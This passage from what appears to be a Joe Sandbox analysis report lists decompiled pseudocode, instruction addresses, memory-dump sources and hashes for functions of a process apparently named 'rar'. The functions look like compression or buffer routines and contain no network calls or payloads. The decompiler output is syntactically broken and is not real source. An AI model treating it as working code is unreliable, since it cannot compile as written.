				if (_t133 != 0) goto 0x50b556bb;
				if (_t133 != 0) goto 0x50b556b8;
				goto 0x50b556da;
				if (r14d <= 0) goto 0x50b55731;
				if (_t119 -  *((intOrPtr*)(__rcx + 4)) > 0) goto 0x50b5573a;
				if (_t176 - _t196 >= 0) goto 0x50b5570a;
				_t68 =  &_v88; // 0x240
				if (_t200 - _t205 >= 0) goto 0x50b5570a;
				 *((intOrPtr*)(__rcx + 0x18 + (_t200 + _t154 * 4) * 4)) =  *((intOrPtr*)(_t68 + _t176 * 4));
				_t201 = _t200 + 1;
				_t177 = _t176 + 1;
				if (_t177 - _t196 < 0) goto 0x50b556ec;
				_t108 =  !=  ? _t119 : _t178 + 1;
				_t120 =  !=  ? _t119 : _t178 + 1;
				_t77 = _t154 + 1; // 0x1
				_t150 =  !=  ? _t154 : _t77;
				_t151 =  !=  ? _t201 : _t150;
				_t202 =  !=  ? _t201 : _t150;
				if (_t177 - _t196 < 0) goto 0x50b556da;
				_t142 = ( !=  ? _t119 : _t178 + 1) -  *((intOrPtr*)(__rcx + 4));
				if (( !=  ? _t119 : _t178 + 1) -  *((intOrPtr*)(__rcx + 4)) <= 0) goto 0x50b555ec;
				return E00007FF67FF650B69D10(0, _t113 ^  *0x50b97310, _v56 ^ _t184);
			}




































                                                                                                            0x7ff650b5550c
                                                                                                            0x7ff650b5550c
                                                                                                            0x7ff650b55511
                                                                                                            0x7ff650b55521
                                                                                                            0x7ff650b55525
                                                                                                            0x7ff650b5552f
                                                                                                            0x7ff650b55533
                                                                                                            0x7ff650b55539
                                                                                                            0x7ff650b5553c
                                                                                                            0x7ff650b55540
                                                                                                            0x7ff650b55543
                                                                                                            0x7ff650b55549
                                                                                                            0x7ff650b55549
                                                                                                            0x7ff650b5554d
                                                                                                            0x7ff650b55551
                                                                                                            0x7ff650b55555
                                                                                                            0x7ff650b5555c
                                                                                                            0x7ff650b5555e
                                                                                                            0x7ff650b55568
                                                                                                            0x7ff650b55571
                                                                                                            0x7ff650b55573
                                                                                                            0x7ff650b5557e
                                                                                                            0x7ff650b5558a
                                                                                                            0x7ff650b55591
                                                                                                            0x7ff650b55594
                                                                                                            0x7ff650b5559a
                                                                                                            0x7ff650b555a2
                                                                                                            0x7ff650b555a5
                                                                                                            0x7ff650b555ac
                                                                                                            0x7ff650b555b0
                                                                                                            0x7ff650b555b3
                                                                                                            0x7ff650b555b7
                                                                                                            0x7ff650b555c3
                                                                                                            0x7ff650b555cd
                                                                                                            0x7ff650b555d2
                                                                                                            0x7ff650b555d8
                                                                                                            0x7ff650b555e9
                                                                                                            0x7ff650b555f5
                                                                                                            0x7ff650b555f9
                                                                                                            0x7ff650b5560c
                                                                                                            0x7ff650b55619
                                                                                                            0x7ff650b55622
                                                                                                            0x7ff650b55629
                                                                                                            0x7ff650b55630
                                                                                                            0x7ff650b55632
                                                                                                            0x7ff650b55636
                                                                                                            0x7ff650b5563c
                                                                                                            0x7ff650b5564a
                                                                                                            0x7ff650b55653
                                                                                                            0x7ff650b55659
                                                                                                            0x7ff650b5565b
                                                                                                            0x7ff650b5565d
                                                                                                            0x7ff650b5565d
                                                                                                            0x7ff650b55661
                                                                                                            0x7ff650b5566d
                                                                                                            0x7ff650b55676
                                                                                                            0x7ff650b5567c
                                                                                                            0x7ff650b55686
                                                                                                            0x7ff650b55691
                                                                                                            0x7ff650b5569c
                                                                                                            0x7ff650b556a7
                                                                                                            0x7ff650b556aa
                                                                                                            0x7ff650b556ae
                                                                                                            0x7ff650b556b0
                                                                                                            0x7ff650b556be
                                                                                                            0x7ff650b556c3
                                                                                                            0x7ff650b556c7
                                                                                                            0x7ff650b556cd
                                                                                                            0x7ff650b556d1
                                                                                                            0x7ff650b556d8
                                                                                                            0x7ff650b556dd
                                                                                                            0x7ff650b556e2
                                                                                                            0x7ff650b556e4
                                                                                                            0x7ff650b556ef
                                                                                                            0x7ff650b556fb
                                                                                                            0x7ff650b556ff
                                                                                                            0x7ff650b55702
                                                                                                            0x7ff650b55708
                                                                                                            0x7ff650b55710
                                                                                                            0x7ff650b55713
                                                                                                            0x7ff650b55715
                                                                                                            0x7ff650b55719
                                                                                                            0x7ff650b55725
                                                                                                            0x7ff650b55729
                                                                                                            0x7ff650b5572f
                                                                                                            0x7ff650b55731
                                                                                                            0x7ff650b55734
                                                                                                            0x7ff650b5575c

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 538e3c6fd73b4f0b0b46b0f2edccfecb53c1c6e6475252e970a1056f39261e3d
                                                                                                            • Instruction ID: fb9880c902c74c042b46d801e5c2876a1d203f73907ba602705ef0718f51cfba
                                                                                                            • Opcode Fuzzy Hash: 538e3c6fd73b4f0b0b46b0f2edccfecb53c1c6e6475252e970a1056f39261e3d
                                                                                                            • Instruction Fuzzy Hash: 33715827F181D299E7018F34C5604FD7BB1A71A789B898072CF9AA3746EE3DE205CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B409C4 Relevance: .2, Instructions: 174COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E00007FF67FF650B409C4(long long __rbx, long long __rdx, void* __r10) {
				void* _t42;
				signed int _t66;
				signed int _t68;
				signed int _t80;
				void* _t90;
				signed long long _t114;
				signed long long _t115;
				signed long long _t116;
				void* _t122;
				signed long long _t128;
				void* _t130;
				intOrPtr _t135;
				void* _t138;
				signed long long _t139;
				signed int* _t147;
				intOrPtr* _t152;
				signed int _t166;

				 *((long long*)(_t138 + 8)) = __rbx;
				_push(_t130);
				_t139 = _t138 - 0x940;
				_t114 =  *0x50b978f0; // 0x27db226282f1
				_t115 = _t114 ^ _t139;
				 *(_t139 + 0x930) = _t115;
				_t66 = r9d;
				r12d = r8d;
				 *((long long*)(_t139 + 0x20)) = __rdx;
				if (r8d - 0x800 >= 0) goto 0x50b40a0b;
				goto 0x50b40bdb;
				_t128 = _t66;
				_t42 = E00007FF67FF650B6C1A0(0, 0, _t139 + 0x130, __rdx, _t128 << 6);
				_t166 = _t128 * 4;
				E00007FF67FF650B6C1A0(E00007FF67FF650B6C1A0(_t42, 0, _t139 + 0x30, __rdx, _t166), 0, _t139 + 0xb0, __rdx, _t166);
				r10d = 4;
				_t122 = __rbx + __rbx;
				goto 0x50b40abf;
				if (_t66 <= 0) goto 0x50b40abc;
				_t147 = _t122 + __rdx;
				bpl =  *_t147;
				bpl = bpl -  *((intOrPtr*)(_t147 +  ~_t128));
				asm("cdq");
				_t90 = (bpl ^ 0) - 0xf;
				if (_t90 <= 0) goto 0x50b40a96;
				 *((intOrPtr*)(_t139 + 0xb0)) =  *((intOrPtr*)(_t139 + 0xb0)) + 1;
				_t116 = _t115 + _t130;
				 *((intOrPtr*)(_t139 + 0x130 + _t116 * 4)) =  *((intOrPtr*)(_t139 + 0x130 + _t116 * 4)) + 1;
				if (_t90 != 0) goto 0x50b40a7e;
				_t135 =  *((intOrPtr*)(_t139 + 0x20));
				if (_t122 + _t166 - r12d - _t66 < 0) goto 0x50b40a63;
				r8d = 0;
				r9d = 0x10000000;
				if (_t66 <= 0) goto 0x50b40b8a;
				r13d = r12d;
				 *((long long*)(_t139 + 0x20)) = __rbx;
				r15d =  *((intOrPtr*)(_t139 + 0x20));
				r13d = r13d >> 2;
				_t152 = _t139 + 0x130;
				_t54 =  <=  ? r15d : 0;
				r15d =  <=  ? r15d : 0;
				_t56 =  <=  ? 0 :  *_t152;
				_t68 = 0 +  *_t152;
				if (1 - 0x10 < 0) goto 0x50b40afc;
				r11d = _t66;
				r11d = r11d *  *(_t139 + _t135 + 0xb0);
				if (_t68 != 0) goto 0x50b40b33;
				goto 0x50b40b3c;
				_t57 = ( <=  ? 0 :  *_t152) << 4;
				_t80 = (( <=  ? 0 :  *_t152) << 4) / _t68;
				 *(_t139 + _t135 + 0x30) = _t80;
				_t70 =  <=  ? r8d : _t80;
				r8d =  <=  ? r8d : _t80;
				if (r11d - r13d > 0) goto 0x50b40b6d;
				if (_t80 - r9d >= 0) goto 0x50b40b6d;
				if (r15d == 0) goto 0x50b40b6b;
				if (_t116 + _t116 * 4 - (_t130 + 0x10) * 4 <= 0) goto 0x50b40b6d;
				_t81 =  >=  ? r9d : _t80;
				r9d =  >=  ? r9d : _t80;
				 *((long long*)(_t139 + 0x20)) =  *((long long*)(_t139 + 0x20)) - 1;
				if (_t80 != r9d) goto 0x50b40af3;
				if (_t66 != 3) goto 0x50b40bb4;
				if ( *((intOrPtr*)(_t139 + 0x30)) - 0xa >= 0) goto 0x50b40bb4;
				if ( *((intOrPtr*)(_t139 + 0x34)) - 0xa >= 0) goto 0x50b40bb4;
				if ( *((intOrPtr*)(_t139 + 0x38)) - 0xa >= 0) goto 0x50b40bb4;
				if (r8d - r9d - r10d >= 0) goto 0x50b40bb4;
				goto 0x50b40bdb;
				if (_t80 - 2 >= 0) goto 0x50b40bca;
				if (r8d - 0xa <= 0) goto 0x50b40bce;
				if (r12d - 0x4000 < 0) goto 0x50b40bd5;
				goto 0x50b40bd0;
				if (r8d - 0xa >= 0) goto 0x50b40bd5;
				if (_t66 - r10d <= 0) goto 0x50b40bd8;
				r10d = 0;
				return E00007FF67FF650B69D10(r10d, _t116 + _t116 * 4,  *(_t139 + 0x930) ^ _t139);
			}




















                                                                                                            0x7ff650b409c4
                                                                                                            0x7ff650b409ca
                                                                                                            0x7ff650b409d4
                                                                                                            0x7ff650b409db
                                                                                                            0x7ff650b409e2
                                                                                                            0x7ff650b409e5
                                                                                                            0x7ff650b409ed
                                                                                                            0x7ff650b409f0
                                                                                                            0x7ff650b409f3
                                                                                                            0x7ff650b40a02
                                                                                                            0x7ff650b40a06
                                                                                                            0x7ff650b40a0b
                                                                                                            0x7ff650b40a1f
                                                                                                            0x7ff650b40a24
                                                                                                            0x7ff650b40a48
                                                                                                            0x7ff650b40a50
                                                                                                            0x7ff650b40a56
                                                                                                            0x7ff650b40a61
                                                                                                            0x7ff650b40a65
                                                                                                            0x7ff650b40a74
                                                                                                            0x7ff650b40a7e
                                                                                                            0x7ff650b40a81
                                                                                                            0x7ff650b40a89
                                                                                                            0x7ff650b40a8e
                                                                                                            0x7ff650b40a91
                                                                                                            0x7ff650b40a93
                                                                                                            0x7ff650b40aa3
                                                                                                            0x7ff650b40aaa
                                                                                                            0x7ff650b40ab5
                                                                                                            0x7ff650b40ab7
                                                                                                            0x7ff650b40ac2
                                                                                                            0x7ff650b40ac4
                                                                                                            0x7ff650b40ac7
                                                                                                            0x7ff650b40ad2
                                                                                                            0x7ff650b40ad8
                                                                                                            0x7ff650b40adb
                                                                                                            0x7ff650b40ae0
                                                                                                            0x7ff650b40aed
                                                                                                            0x7ff650b40af9
                                                                                                            0x7ff650b40b01
                                                                                                            0x7ff650b40b05
                                                                                                            0x7ff650b40b0d
                                                                                                            0x7ff650b40b10
                                                                                                            0x7ff650b40b1d
                                                                                                            0x7ff650b40b1f
                                                                                                            0x7ff650b40b22
                                                                                                            0x7ff650b40b2d
                                                                                                            0x7ff650b40b31
                                                                                                            0x7ff650b40b35
                                                                                                            0x7ff650b40b3a
                                                                                                            0x7ff650b40b3f
                                                                                                            0x7ff650b40b45
                                                                                                            0x7ff650b40b49
                                                                                                            0x7ff650b40b4f
                                                                                                            0x7ff650b40b53
                                                                                                            0x7ff650b40b58
                                                                                                            0x7ff650b40b69
                                                                                                            0x7ff650b40b70
                                                                                                            0x7ff650b40b7b
                                                                                                            0x7ff650b40b7e
                                                                                                            0x7ff650b40b84
                                                                                                            0x7ff650b40b8d
                                                                                                            0x7ff650b40b94
                                                                                                            0x7ff650b40b9b
                                                                                                            0x7ff650b40ba2
                                                                                                            0x7ff650b40bad
                                                                                                            0x7ff650b40bb2
                                                                                                            0x7ff650b40bb7
                                                                                                            0x7ff650b40bbd
                                                                                                            0x7ff650b40bc6
                                                                                                            0x7ff650b40bc8
                                                                                                            0x7ff650b40bce
                                                                                                            0x7ff650b40bd3
                                                                                                            0x7ff650b40bd5
                                                                                                            0x7ff650b40c05

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f662aec1ef6b157bddd435191dbe8c6349fb1bcc35b13943225a4f7e5346e2ad
                                                                                                            • Instruction ID: 87952b8a095bb2b01d67f8c8755d97b1439ca75bedcee90f4364685a08596608
                                                                                                            • Opcode Fuzzy Hash: f662aec1ef6b157bddd435191dbe8c6349fb1bcc35b13943225a4f7e5346e2ad
                                                                                                            • Instruction Fuzzy Hash: 16515B32B3869366E734CB25A8C477A7292FB86788F184435DA8FE2785DE3DD6018704
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B3B120 Relevance: .2, Instructions: 171COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E00007FF67FF650B3B120(intOrPtr __edx, long long __rbx, long long __rcx, unsigned int __rdx, long long __rsi, void* __r8, void* __r9, void* __r10, long long _a8, long long _a16, long long _a24) {
				void* _t79;
				void* _t88;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				signed int _t110;
				void* _t120;
				void* _t123;
				intOrPtr _t132;
				signed int _t151;
				unsigned long long _t168;
				long long _t169;
				signed int _t170;
				long long _t171;
				signed long long _t172;
				long long _t173;
				long long _t175;
				long long _t177;
				unsigned int _t194;
				signed long long _t196;
				long long _t197;
				void* _t208;

				_t208 = __r10;
				_t207 = __r9;
				_t197 = __rsi;
				_t194 = __rdx;
				_t177 = __rcx;
				_a16 = __rbx;
				_a24 = __rsi;
				_a8 = __rcx;
				_t175 = __rcx;
				 *((intOrPtr*)(__rcx + 0x110)) = __edx;
				r9d = 0x400000;
				if (__rdx - __r9 <= 0) goto 0x50b3b15f;
				 *((intOrPtr*)(__rcx + 0x110)) = __edx;
				r8d = 0x4000000;
				if (__rdx - __r8 <= 0) goto 0x50b3b177;
				 *((intOrPtr*)(__rcx + 0x110)) = __edx;
				if (__rdx - 0x40000000 <= 0) goto 0x50b3b18d;
				_t168 = __rdx >> 3;
				 *((intOrPtr*)(__rcx + 0x110)) = __edx;
				if (__edx - 0x40000 >= 0) goto 0x50b3b1a3;
				 *((intOrPtr*)(__rcx + 0x110)) = 0x40000;
				 *((intOrPtr*)(__rcx + 0x114)) = 0x3ffff;
				_t132 =  >  ? r9d : __edx;
				 *((intOrPtr*)(__rcx + 0x128)) = _t132;
				_t79 =  <  ? r8d : __rdx + __rdx;
				if (__rdx - _t168 >= 0) goto 0x50b3b1d2;
				_t196 = __rdx + __rdx;
				goto 0x50b3b1de;
				_t81 =  >  ? _t132 : 0x1011;
				_t123 = __edx + 0xffffefef - ( >  ? _t132 : 0x1011);
				_t12 = _t177 - 0x100; // -4290769135
				 *((intOrPtr*)(__rcx + 0x124)) = _t12;
				 *(__rcx + 0x118) = _t196;
				 *((intOrPtr*)(__rcx + 0x120)) = _t196 - 1;
				E00007FF67FF650B20F54( *((intOrPtr*)(__rcx + 0x6390)), _t168, __rcx, __rcx + 0x63d8, __rsi, __r8);
				_t151 =  *(_t175 + 0x128);
				_t169 =  <  ? 0xffffffff : _t168;
				E00007FF67FF650B69B9C(__rdx, _t207);
				 *((long long*)(_t175 + 0x108)) = _t169;
				_t88 = E00007FF67FF650B69B9C(_t194, _t207);
				 *((long long*)(_t175 + 0xe0)) = _t169;
				E00007FF67FF650B6C1A0(_t88, 0,  *((intOrPtr*)(_t175 + 0x108)), _t194, _t196 * 4);
				E00007FF67FF650B69B9C(_t194, _t207);
				 *((long long*)(_t175 + 0xe8)) = _t169;
				E00007FF67FF650B69B9C(_t194, _t207);
				 *((long long*)(_t175 + 0xf0)) = _t169;
				E00007FF67FF650B69B9C(_t194, _t207);
				 *((long long*)(_t175 + 0xf8)) = _t169;
				_t170 =  <  ? 0xffffffff : _t169;
				E00007FF67FF650B69B9C(_t194, _t207);
				 *(_t175 + 0x100) = _t170;
				E00007FF67FF650B69B9C(_t194, _t207);
				 *(_t175 + 0x4140) = _t170;
				 *(_t175 + 0x10) = _t170;
				_t171 =  <  ? 0xffffffff : _t170;
				_t99 = E00007FF67FF650B69B9C(_t194, _t207);
				 *((long long*)(_t175 + 8)) = _t171;
				_t204 = _t196 + 0x1011;
				_t100 = E00007FF67FF650B6C1A0(_t99, 0,  *((intOrPtr*)(_t175 + 0xe0)), _t194, _t196 + 0x1011);
				r8d = 0x4000;
				_t101 = E00007FF67FF650B6C1A0(_t100, 0,  *((intOrPtr*)(_t175 + 0xe8)), _t194, _t196 + 0x1011);
				r8d = 0x80000;
				_t102 = E00007FF67FF650B6C1A0(_t101, 0,  *((intOrPtr*)(_t175 + 0xf0)), _t194, _t196 + 0x1011);
				r8d = 0x100000;
				_t103 = E00007FF67FF650B6C1A0(_t102, 0,  *((intOrPtr*)(_t175 + 0xf8)), _t194, _t204);
				r8d =  *((intOrPtr*)(_t175 + 0x110));
				E00007FF67FF650B6C1A0(E00007FF67FF650B6C1A0(_t103, 0,  *(_t175 + 0x100), _t194, _t204 << 2), 0,  *((intOrPtr*)(_t175 + 8)), _t194,  *(_t175 + 0x10) * 0x24428);
				_t172 =  <  ? 0xffffffff : _t171;
				E00007FF67FF650B69B9C(_t194, _t207);
				 *(_t175 + 0x6180) = _t172;
				_t110 =  *(_t175 + 0x6390) << 0x11;
				 *(_t175 + 0x63a0) = _t110;
				if (_t110 - _t151 <= 0) goto 0x50b3b395;
				 *(_t175 + 0x63a0) = _t151;
				_t173 =  <  ? 0xffffffff : _t172;
				E00007FF67FF650B69B9C(_t194, _t207);
				 *((long long*)(_t175 + 0x6398)) = _t173;
				if (0 -  *(_t175 + 0x6390) >= 0) goto 0x50b3b3d2;
				E00007FF67FF650B69B58(_t173, _t173);
				 *((long long*)(_t175 + 0x6190 + _t196 * 8)) = _t173;
				goto 0x50b3b3b4;
				E00007FF67FF650B3B840(_t120, _t173, _t175, _t175, _t194, _t197,  *(_t175 + 0x10) * 0x24428);
				r8d = 0;
				E00007FF67FF650B3A540(0x00000008 * _t172 >> 0x00000020 ^ 0x00000008 * _t172 >> 0x00000020, _t175, _t175, _t194, _t197,  *(_t175 + 0x10) * 0x24428, _t208);
				return 0;
			}



























                                                                                                            0x7ff650b3b120
                                                                                                            0x7ff650b3b120
                                                                                                            0x7ff650b3b120
                                                                                                            0x7ff650b3b120
                                                                                                            0x7ff650b3b120
                                                                                                            0x7ff650b3b120
                                                                                                            0x7ff650b3b125
                                                                                                            0x7ff650b3b12a
                                                                                                            0x7ff650b3b13b
                                                                                                            0x7ff650b3b140
                                                                                                            0x7ff650b3b148
                                                                                                            0x7ff650b3b151
                                                                                                            0x7ff650b3b159
                                                                                                            0x7ff650b3b15f
                                                                                                            0x7ff650b3b168
                                                                                                            0x7ff650b3b171
                                                                                                            0x7ff650b3b17e
                                                                                                            0x7ff650b3b183
                                                                                                            0x7ff650b3b187
                                                                                                            0x7ff650b3b192
                                                                                                            0x7ff650b3b194
                                                                                                            0x7ff650b3b1a5
                                                                                                            0x7ff650b3b1ae
                                                                                                            0x7ff650b3b1b2
                                                                                                            0x7ff650b3b1be
                                                                                                            0x7ff650b3b1c5
                                                                                                            0x7ff650b3b1c7
                                                                                                            0x7ff650b3b1d0
                                                                                                            0x7ff650b3b1d9
                                                                                                            0x7ff650b3b1dc
                                                                                                            0x7ff650b3b1de
                                                                                                            0x7ff650b3b1e4
                                                                                                            0x7ff650b3b1ea
                                                                                                            0x7ff650b3b1f4
                                                                                                            0x7ff650b3b207
                                                                                                            0x7ff650b3b20c
                                                                                                            0x7ff650b3b221
                                                                                                            0x7ff650b3b228
                                                                                                            0x7ff650b3b22d
                                                                                                            0x7ff650b3b23e
                                                                                                            0x7ff650b3b243
                                                                                                            0x7ff650b3b25b
                                                                                                            0x7ff650b3b265
                                                                                                            0x7ff650b3b26a
                                                                                                            0x7ff650b3b278
                                                                                                            0x7ff650b3b27d
                                                                                                            0x7ff650b3b289
                                                                                                            0x7ff650b3b28e
                                                                                                            0x7ff650b3b2a3
                                                                                                            0x7ff650b3b2aa
                                                                                                            0x7ff650b3b2af
                                                                                                            0x7ff650b3b2bb
                                                                                                            0x7ff650b3b2c0
                                                                                                            0x7ff650b3b2cd
                                                                                                            0x7ff650b3b2d9
                                                                                                            0x7ff650b3b2e0
                                                                                                            0x7ff650b3b2e5
                                                                                                            0x7ff650b3b2e9
                                                                                                            0x7ff650b3b2f5
                                                                                                            0x7ff650b3b2fc
                                                                                                            0x7ff650b3b309
                                                                                                            0x7ff650b3b30e
                                                                                                            0x7ff650b3b31a
                                                                                                            0x7ff650b3b321
                                                                                                            0x7ff650b3b32e
                                                                                                            0x7ff650b3b333
                                                                                                            0x7ff650b3b35a
                                                                                                            0x7ff650b3b367
                                                                                                            0x7ff650b3b36e
                                                                                                            0x7ff650b3b373
                                                                                                            0x7ff650b3b380
                                                                                                            0x7ff650b3b383
                                                                                                            0x7ff650b3b38b
                                                                                                            0x7ff650b3b38d
                                                                                                            0x7ff650b3b39f
                                                                                                            0x7ff650b3b3a6
                                                                                                            0x7ff650b3b3ab
                                                                                                            0x7ff650b3b3ba
                                                                                                            0x7ff650b3b3c1
                                                                                                            0x7ff650b3b3c6
                                                                                                            0x7ff650b3b3d0
                                                                                                            0x7ff650b3b3d5
                                                                                                            0x7ff650b3b3db
                                                                                                            0x7ff650b3b3e3
                                                                                                            0x7ff650b3b401

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a1f980415a767e085383642b66dddfb5d86a1d45d91619167f8d9429a3d7535f
                                                                                                            • Instruction ID: f196908a954221657256d0badb3bf29cfabbc141e6e3cbc59129794968174c74
                                                                                                            • Opcode Fuzzy Hash: a1f980415a767e085383642b66dddfb5d86a1d45d91619167f8d9429a3d7535f
                                                                                                            • Instruction Fuzzy Hash: 1D71BE32A14A8246EB44DF25E8417EC33A5FB8AB84F084135DB5EEB389DF79E0408754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B564F4 Relevance: .2, Instructions: 164COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 26%
                                                                                                            			E00007FF67FF650B564F4(void* __edx, long long __rbx, signed int __rcx, signed int __rdx, long long __rdi, long long __rsi, signed int __r8, void* __r9, long long __r12) {
				void* _t125;
				void* _t127;
				signed long long _t128;
				void* _t139;
				void* _t144;
				void* _t146;
				void* _t153;
				intOrPtr _t154;
				intOrPtr _t162;

				_t138 = __rdi;
				_t127 = _t146;
				 *((long long*)(_t127 + 8)) = __rbx;
				 *((long long*)(_t127 + 0x10)) = __rsi;
				 *((long long*)(_t127 + 0x18)) = __rdi;
				 *((long long*)(_t127 + 0x20)) = __r12;
				_t5 = _t127 - 0x4f; // -198
				_t144 = _t5;
				_t162 =  *((intOrPtr*)(_t144 + 0x77));
				asm("movaps [eax-0x28], xmm6");
				asm("movaps [eax-0x38], xmm7");
				asm("inc esp");
				if (((r9b | r11b) & 0x0000000f) != 0) goto 0x50b56761;
				if ( *0x50bb3014 - 3 < 0) goto 0x50b56761;
				r8d = r8d *  *(__rcx + 0x14);
				_t128 =  *((intOrPtr*)(__rcx + 0x28));
				_t153 =  *__rcx;
				r8d = r8d + __edx;
				r13d =  *((intOrPtr*)(_t128 + __r8 * 4));
				r8d = 0;
				_t14 = _t138 + 0x10; // 0x10
				r12d = _t14;
				 *((char*)(_t144 + __r8 - 0x69)) =  *((intOrPtr*)(_t153 + _t128 * 4));
				 *((char*)(_t144 + __r8 - 0x29)) =  *(_t153 + __rcx * 4) >> 8;
				 *((char*)(_t144 + __r8 - 0x79)) =  *(_t153 + __rcx * 4);
				 *((char*)(_t144 + __r8 - 0x39)) =  *(_t153 + __rcx * 4) >> 8;
				 *((char*)(_t144 + __r8 - 0x59)) =  *(_t153 + __rcx * 4);
				 *((char*)(_t144 + __r8 - 0x19)) =  *(_t153 + __rcx * 4) >> 8;
				 *((char*)(_t144 + __r8 - 0x49)) =  *(_t153 + __rcx * 4);
				 *((char*)(_t144 + __r8 - 9)) =  *(_t153 + __rcx * 4) >> 8;
				if (1 - r12d < 0) goto 0x50b5656b;
				_t154 =  *((intOrPtr*)(_t144 + 0x7f));
				asm("inc sp");
				asm("inc cx");
				if (_t154 - 0x20 < 0) goto 0x50b56723;
				asm("repe inc ecx");
				_t139 = __rdi + 0x20;
				asm("repe inc ecx");
				asm("movdqa xmm7, xmm6");
				asm("pand xmm6, [0x2ecae]");
				asm("movdqa xmm0, xmm1");
				asm("pand xmm1, [0x2eca2]");
				asm("movdqa xmm5, [ebp-0x79]");
				asm("movdqa xmm2, [ebp-0x39]");
				asm("psrlw xmm0, 0x8");
				asm("packuswb xmm6, xmm1");
				asm("movdqa xmm1, [ebp-0x59]");
				asm("movdqa xmm4, xmm6");
				asm("pand xmm4, [0x2ec8e]");
				asm("inc cx");
				asm("psrlw xmm7, 0x8");
				asm("packuswb xmm7, xmm0");
				asm("movdqa xmm0, [ebp-0x69]");
